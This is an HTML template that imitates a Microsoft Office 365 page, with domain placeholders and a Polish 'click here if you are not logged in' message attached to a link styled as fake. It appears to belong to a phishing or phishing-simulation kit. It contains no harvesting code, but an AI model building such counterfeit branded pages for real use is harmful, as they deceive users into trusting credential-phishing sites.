<html>
  <head>
    <title>Office 365 | Microsoft Office</title>
    <meta charset="utf-8" />
    <link
      rel="icon"
      type="image/png"
      href="{domain}/static/office-365-icon.png"
    />
    <style>
      html, body {
        height: 100%;
      }
      body {
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        margin: 0;
      }
      *:focus {
        outline: none;
      }
      a {
        color: #0068b7;
      }
      a:link,
      a:active,
      a:visited,
      a:hover {
        font-weight: normal;
        text-decoration: none;
      }
      .fake-link {
        cursor: pointer;
      }
      .ButtonLink {
        font-weight: normal;
        font-size: 16px;
        color: #ffffff;
        text-decoration: none;
        background: none;
        border: none;
        cursor: pointer;
      }
      h1,
      h2,
      h3 {
        font-weight: normal;
      }
      h1 {
        font-size: 36px;
      }
      input[type="text"]:focus,
      input[type="password"]:focus {
        border-bottom-width: 1.5px;
      }
      input[type="text"],
      input[type="password"] {
        width: 100%;
        padding: 0px 0px 10px 0px;
        margin: 8px 0;
        border: none;
        border-bottom: 1px solid #0067b8;
        font-size: 14px;
        font-weight: normal;
      }
    </style>
  </head>
  <body bgcolor="#FFFFFF" background="{domain}/static/Background.jpg">
    <table
      cellspacing="0"
      cellpadding="0"
      border="0"
      width="100%"
      height="100%"
    >
      <tr>
        <td valign="middle" align="center">
          <table
            cellspacing="0"
            cellpadding="45"
            border="0"
            width="600"
            bgcolor="#FFFFFF"
          >
            <tr>
              <td>
                <p>
                  <img
                    src="{domain}/static/windows_logo.png"
                    border="0"
                    alt=""
                  />
                </p>
              </td>
            </tr>
            <tr>
              <td>
                <h3>
                  Kliknij <a class="fake-link">tutaj</a>
                  jeżeli nie zostaniesz zalogowany w kilka sekund.
                </h3>
              </td>
            </tr>
            <tr>
              <td>
                <p>&copy; 2002-{current_year} Microsoft Corporation</p>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
  </body>
</html>